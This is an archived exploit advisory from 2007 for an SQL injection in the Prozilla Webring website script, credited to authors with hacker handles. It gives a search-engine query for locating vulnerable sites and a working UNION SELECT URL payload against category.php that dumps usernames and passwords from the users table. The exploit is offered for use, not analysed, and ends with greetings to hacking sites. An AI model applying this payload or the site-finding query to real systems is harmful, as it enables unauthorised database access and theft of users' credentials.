Home / os / solaris

prozillawebring-sql.txt

Posted on 14 August 2007

--==+================================================================================+==-- --== Prozilla Webring Website Script SQL Injection Vulnerbility +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SITE: http://prozilla.com DORK: altavista dork (include quotes) : "Create your own free webring and bring traffic to your website. Join now, it's free!" DESCRIPTION: pull user details from the database, returns multiple data :D EXPLOITS: http://server.com/Script_Dir/category.php?cat=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(username,0x3a,password),3,4,5/**/FROM/**/users/* NOTE/TIP: GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.org ! --==+================================================================================+==-- --== Prozilla Webring Website Script SQL Injection Vulnerbility +==-- --==+================================================================================+==--

 

TOP